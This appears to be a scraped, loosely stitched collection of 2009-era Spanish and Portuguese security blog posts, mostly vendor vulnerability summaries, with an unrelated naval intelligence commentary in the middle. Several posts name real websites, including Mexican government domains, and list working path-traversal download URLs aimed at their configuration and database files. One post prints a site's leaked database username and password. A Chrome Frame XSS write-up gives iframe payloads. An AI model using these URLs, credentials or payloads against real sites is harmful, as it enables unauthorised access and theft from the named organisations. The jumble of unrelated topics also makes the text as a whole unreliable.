Pagina: http://www.anhelodiseno.com.mx/
Vulnerabilidad: Arbitrary Downloader.
Archivo vulnerable: descargas.php
Explotando: http://www.anhelodiseno.com.mx/hubbell/descargas.php?pdf=../mysql.php

/* variables de conexión */
var $BaseDatos;
var $Servidor;
var $Usuario;
var $Clave;

/* Método Constructor: Cada vez que creemos una variable
de esta clase, se ejecutará esta función */
function DB_mysql($bd = "anhelo01_hubbell", $host = "localhost", $user = "anhelo01_hubbell", $pass = "hubbell4517") {
$this->BaseDatos = $bd;
$this->Servidor = $host;
$this->Usuario = $user;
$this->Clave = $pass;
}


ASUNTO

Comentario al artículo “Alakrana: lecciones aprendidas“, del Almirante Ángel Tafalla Balduz, publicado en la Revista Atenea con fecha viernes, 20 NOV 09.

COMENTARIO

1.- ¿Tenemos la capacidad de desplegar dos fragatas de la clase F-100 en el Océano Índico? Sí.

2.- ¿Tenemos unas capacidades C4ISR adecuadas para el final de la primera década del S. XXI? Sí.

3.- ¿Tenemos la capacidad de realizar operaciones especiales en ambiente hostil y empleando toda suerte de medios? Sí.

Evidentemente, conocemos cuál es nuestro listado exhaustivo de CAPACIDADES. Sin embargo, la cuestión clave complementaria sería el consabido:

¿Tenemos la INTENCIÓN de emplear todas esas capacidades militares contra los piratas? ¡No!

Y este “NO” de nuestras intenciones continuará influyendo no sólo sobre nuestras capacidades, sino también sobre nuestros probables cursos de acción en el marco de la operación ATALANTA.

Como muy bien deja entrever el Almirante Tafalla en el último párrafo de su artículo —y ciñéndonos exclusivamente al ámbito militar—, el secuestro del Alakrana ha dejado al descubierto algunas vulnerabilidades INTEL de las F-100 en particular y, por extrapolación, del CIFAS en general. Por citar algunas:

a) ¿Tienen las F-100 la capacidad de obtención HUMINT en el nivel táctico-operacional? No.

b) ¿Tienen las F-100 la capacidad de realizar operaciones de Información (INFO OPS) o sicológicas (PSYOPS) sobre el “enemigo” en los niveles táctico y operacional? No.

c) ¿Tienen las F-100 la capacidad de Contrainteligencia (CI) necesaria contra los medios ISTAR (sic!) del “adversario” y sus actividades TESSOC (terrorismo, espionaje, subversión, sabotaje y crimen organizado)? No.

En este sentido, coincido con el Almirante en que una de las principales lecciones aprendidas en el plano militar hace referencia precisamente a esos “fallos de Inteligencia”. Sin duda, hay que reforzar con más medios humanos y materiales todos los nodos de Inteligencia: comenzado por el nodo principal (CIFAS), y descendiendo hasta los nodos de captación de las F-100. Otra vulnerabilidad añadida la constituye su interrelación con los nodos secundarios (CMOPS) y los de “consulta” (CNI). Como es sabido, CIFAS y CNI no “comprehenden” del mismo modo sus zonas de responsabilidad de inteligencia (ZRI).

Múltiples vulnerabilidades han sido reportadas en PHP, algunos de los cuales tienen un impacto desconocido y otras que pueden ser explotadas por usuarios maliciosos para eludir ciertas restricciones de seguridad. A continuación se detallan las vulnerabilidades detectadas.

1) Errores de validación de entrada existentes en el tratamiento de los datos EXIF.

2) Un error en “tempnam ()” puede ser explotado para eludir la característica ”safe_mode”.

3) Un error en “posix_mkfifo ()” puede ser aprovechado para eludir la característica “open_basedir”.

SOLUCIÓN: Actualizar a la versión 5.3.1.

#####################################
Google Chrome Frame null domain XSS
URL afectada: http://www.google.com/chromeframe
Changelog del vendedor: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html
Reportado por: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html
Notificación al vendedor: SÍ Exploit disponible: SÍ
######################################

######################
Descripción del vendedor
######################

Google Chrome Frame es un plug-in gratuito para Internet Explorer. Algunas aplicaciones web avanzadas, como Google Wave, contiene el uso de Google Chrome Frame para ofrecerle características adicionales y un mejor rendimiento.

Google Chrome Frame es una etapa inicial de código abierto, un plug-in que hace a la perfección Google Chrome mejorando las tecnologías web y el motor de JavaScript de Internet Explorer.

################
Versiones afectadas
################

4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3

Versiones no afectadas:

4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5

Para más información visiten:

http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html

#####################
Cross Site Scripting
#####################

Creamos un documento HTML para probar y metemos =>

<iframe src=”javascript:alert(1)></iframe>

=> se abre el iframe y ejecuta el alert (esto es lo correcto)

<iframe src=”cf:javascript:alert(1)></iframe>

=> esto no funciona, no muestra el alert (sigue siendo correcto)

Y aquí está el error:

<iframe src=”cf:view-source:javascript:alert(1)></iframe>

Este code ejecuta y muestra el alert que funciona en local y a su vez en remoto o también a través de la barra de dirección.

Esto pasa las políticas de origen de datos !!

Para probar el navegador Google Chrome ponemos en la barra de dirección =>

view-source:javascript:alert(1)

Esto ejecuta el alert, aun así Google hace poco decidió realizar unos cambios en él como poner la página en blanco, este tema es sólo explotable a través de la barra de direcciones, no en un iframe o frame o documento html, así que por ese motivo creo que este problema no es explotable remotamente.

###########
Crashes
###########

cf:view-source:about@: => se rompe
cf:about@: => rompe el tab

##########
Solución
############

Google automáticamente ha sacado una nueva versión de Chrome Frame 4.0.245.1 (Official Build 31970) y esta versión no está afectada por esta vulnerabilidad.

#################€nd#############

Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team

atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
—————–

thz Lost

Un nuevo informe realizado por un fabricante de seguridad para móviles detalla cómo los smartphones más populares, como el iPhone, son muy vulnerables cuando están conectados a redes Wi-Fi públicas.

El estudio ha sido realizado por SMobile Systems y afirma que los usuarios de este tipo de teléfonos de última generación que se conectan a hotspots Wi-Fi sin encriptar  pueden verse fácilmente atacados  utilizando herramientas conocidas por todos. Los autores del estudio emplearon estas herramientas para interceptar combinaciones de nombre de usuario y contraseñas enviadas desde diferentes teléfonos inteligentes.

Para realizar estas pruebas, utilizaron un portátil con herramientas de software que permiten interceptar comunicaciones entre smartphones que se conecten a un punto de acceso Wi-Fi. Esa información fue posteriormente utilizada para acceder a toda una variedad de cuentas de correo electrónico. La misma información podría ser utilizada para acceder a una cuenta bancaria on-line o a cualquier otro dato.

Smobile probó diferentes dispositivos, como el Nokia N95, HTC Tilt con Windows Mobile, HTC G1 con Android y el iPhone 3GS con el último firmware. En cada caso, el usuario no tenía ni idea de que sus datos estaban comprometidos.

“Utilizando este método, el atacante indicaría al dispositivo de la víctima cómo dirigir todo el tráfico a través de la máquina del atacante que luego pediría estos datos al hotspot Wi-Fi”. El equipo atacante capturaría todo el tráfico y podría modificar o acabar con conexiones activas. Una vez superado el control SSL, tan pronto como la víctima accede a su correo electrónico o a otra cuenta, las credenciales de acceso aparecerán como texto simple en el equipo del atacante.

Los autores del estudio han avisado a los usuarios de smartphones  para que “busquen e identifiquen aplicaciones que les proporcionen tecnologías de encriptación adecuadas para proteger información confidencial o privada”. Existen aplicaciones para realizar esas tareas, aunque aún no son muchas. El objetivo será conseguir encriptación end-to-end entre la aplicación del cliente y el servidor objetivo. Sin esa protección, los usuarios deberán estar atentos y saber que su información podrá ser visible para cualquier atacante.

Para las empresas es fundamental tratar a los smartphones con capacidades de conexión Wi-Fi como si se tratara de portátiles corporativos. Es decir, que cuenten con software de seguridad, firewall y antivirus.

Fuente: idg

Si eres usuario de Kaspersky Antivirus 2010 te interesará saber que se ha descubierto una vulnerabilidad en Kaspersky Anti-Virus 2010, que puede ser explotada por usuarios locales maliciosos para provocar un DoS (Denial of Service).

La vulnerabilidad se debe a un error en el controlador kl1.sys al manipular IOCTL. Esto puede ser explotado para eliminar la referencia de memoria no válida y causar un “crash” a través de un núcleo especialmente diseñado 0×0022C008IOCTL.

La vulnerabilidad está confirmada en la versión 9.0.0.463. Otras versiones también pueden verse afectadas.

SOLUCIÓN: Actualizar a la versión 9.0.0.736.

La pagina vulnerable: www.congreso-hidalgo.gob.mx/
Vulnerabilidad: Bajar.php?id=
Metodo: Full Source Discloure / Arbitrary Downloader.

Explotando:
www.congreso-hidalgo.gob.mx/Bajar.php?id=../index.php

www.congreso-hidalgo.gob.mx/Bajar.php?id=../Bajar.php

www.congreso-hidalgo.gob.mx/Bajar.php?id=../config/phpwcms/conf.inc.php

www.congreso-hidalgo.gob.mx/Bajar.php?id=../include/inc_lib/default.inc.php

www.congreso-hidalgo.gob.mx/Bajar.php?id=../include/inc_lib/dbcon.inc.php

Happy UnderHacking

/klanx

     Nessa última sexta-feira 13 (data sugestiva), foi divulgado pela  Microsoft uma nova vulnerabilidade em seu novo sistema operacional Winodows 7, sendo a mesma classificada como uma falha de zero-day*, este bug encontra-se no Server Message Block (SMB)**, um protocolo criado pela empresa que forma o backbone de compartilhamento de arquivos do Windows. O erro só pode ser explorado para congelar o computador, não permitindo a instalação de nenhum código malicioso.

     Para se defender dessa vulnerabilidade basta bloquear as portas TCP 135 até 139. Já bloquear a porta 445 irá prevenir que tráfegos SMB externos entrem em sua rede.

     Com o firewall bloqueado, a ameaça ainda persiste dentro do seu sistema, mas os sistemas internos da rede devem ser mais confiáveis do que aqueles encontrados na internet. Você também pode bloquear as portas da rede interna, mas você pode ficar impossibilitado de acessar arquivos e pastas localizados nessa área.

     Com essas configurações básicas já dá para se ter uma segurança maior até que a próxima vulnerabilidade seja divulgada. Vale lembrar não existe sistema 100% seguro.

     *Server Message Block (SMB) trabalha como um protocolo de rede da camada de aplicação e tem como objetivo principal prover acesso compartilhado a arquivos, impressoras, portas seriais e outras comunicações entre nós (equipamentos) na rede. Ele também provê um mecanisco de comunicação entre processos de forma autenticada. Em grande parte seu uso se dá por computadores rodando sistemas operacionais Microsoft Windows.

     **Um ataque zero-day (ou zero-hour)  é uma ameaça de computador que tenta explorar alguma vulnerabilidade em aplicações de computador que ainda não são de conhecimento do público, nem mesmo dos fabricantes das aplicações, ou ameaças que ainda não tenham correções disponíveis. Os ataques zero-day são usados ou compartilhados pelos hackers (ofensores) antes que os fabricantes das aplicações saibam das vulnerabilidades encontradas nelas.

Empezando la tarde con un buen post, al visitar la pagina de tunich me gusto la forma de postear las vulnerabilidades de paginas de interes social. Aqui ayudando a esa idea posteo esta vulnerabilidad.

La pagina vulnerable: administracion.saf.tabasco.gob.mx
Vulnerabilidad: /scripts/descarga.php?ruta=
Metodo: Full Path Discloure

Explotando:
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_source.php
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_conection.php
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/index.php

Ahi se las dejo, es cuestion de la imaginacion.
Como dirian por ahi… Happy hacking.

/klanx

Como sabéis recientemente Microsoft ha publicado su boletín de seguridad de este mes de Noviembre, con menos actualizaciones a realizar si la comparamos con la del mes de Octubre. De lo que más me ha sorprendido este boletín es de la multitud de vulnerabilidades descubiertas en Microsoft Excel, y que como usuario la verdad es que me preocupaban (hablo en pasado porque ayer actualicé mi Windows). A continuación os dejo una relación de las vulnerabilidades detectadas y su posible explotación.

El fallo se presenta como un estándar SSL en sí mismo, lo que significa que todos los sistemas que utilicen el protocolo podrían ser vulnerables a los ataques.

Un nuevo fallo en el protocolo SSL (Secure Socket Layer) pone a empresas de telecomunicaciones y vendedores de seguridad en la picota.

El vendedor de seguridad móvil PhoneFactor ha dicho que la vulnerabilidad se ha descubierto en la transmisión de los datos a través de conexiones SSL. El fallo podría, potencialmente, permitir a un hacker ejecutar un ataque ‘man in the middle’, o de intermediario, en el que el atacante adquiere la capacidad de alterar la información enviada entre dos usuarios sin que ninguno de ellos lo sepa.

Según PhoneFactor el fallo se presenta como un estándar SSL en sí mismo, lo que significa que todos los sistemas que utilicen el protocolo podrían ser vulnerables a los ataques.

Steve Dispensa, director de tecnología de PhoneFactor afirma que ya que el fallo está en el propio protocolo y no es su implementación, “el impacto tiene mucho más alcance”. Por lo tanto, el experto en seguridad afirma que todas las librerías SSL tienen que ser parcheadas y la mayoría de las aplicaciones de clientes y servidores “necesitarán, como mínimo, incluir copias de librerías SSL en sus productos”.

Fuente: ITespresso

Algunas vulnerabilidades han sido detectadas en Google Chrome, que potencialmente puede ser explotadas por usuarios maliciosos para revelar información sensible o comprometer nuestro sistema.

En la primera vulnerabilidad encontrada, el navegador no puede mostrar una advertencia de seguridad cuando un usuario descarga y abre por ejemplo archivos XML, SVG o MHT. Esto puede ser explotado potencialmente para ejecutar código JavaScript arbitrario de forma local y divulgar el contenido de nuestros archivos locales a través de una página web especialmente diseñado para ello.

La segunda vulnerabilidad trata de un error en la aplicación de SQL Gears API que puede ser aprovechado para poner metadatos de SQL corruptos  y causar una corrupción de memoria. La explotación exitosa de esta vulnerabilidad puede permitir la ejecución de código arbitrario, pero requiere que el usuario permita la interacción de un sitio web malicioso con el plug-in Gears.

Las vulnerabilidades se presentan en versiones anteriores a la 3.0.195.32.

SOLUCIÓN: Actualizar a la versión 3.0.195.32.

Para usuarios de placas Intel DQ35JO, DQ35MP, DQ45CB y DQ45EK.

Se ha detectado una vulnerabilidad que puede ser explotada por usuarios maliciosos locales y pueden provocar una denegación de servicio (DoS) o una escalada de privilegios.

Solución: actualizar la BIOS.

En las últimas horas se han descubierto algunos problemas de seguridad en Joomla!. Se trata de fallas que permite descubrir versiones de ciertos módulos y que permite a usuarios maliciosos a manipular ciertos datos.

En concreto se trata de un error en el manejo de archivos XML que puede ser explotado para ver la versión de los módulos instalados. Además un error no especificado en la solicitud de datos puede ser explotado para modificar artículos de la página principal de otros usuarios.

Los problemas de seguridad se presentan en versiones anteriores a la 1.5.15.

SOLUCIÓN: Actualizar a la versión 1.5.15 y restringir el acceso a los archivos XML (por ejemplo, a través de un “. Htaccess”).

En las últimas horas se han detectado múltiples vulnerabilidades en el Shockwave Player de Adobe. Las relaciono a continuación:

1) Un error relacionado con el uso de un índice no válido permite la ejecución de código arbitrario a través de Shockwavecontent.

2) Un error relacionado con el uso de un puntero no válido permite la ejecución de código arbitrario a través de Shockwavecontent.

3) Un error relacionado con el uso de un puntero no válido permite la ejecución de código arbitrario a través de craftedShockwave.

4) Un error en el tratamiento de longitudes de cadena puede ser explotado para provocar una corrupción de la memoria y permitir la ejecución de código arbitrario.

Las vulnerabilidades afectan a la versión 11.5.1.601 y anteriores.

SOLUCIÓN: Actualizar a la versión 11.5.2.602: http://get.adobe.com/shockwave/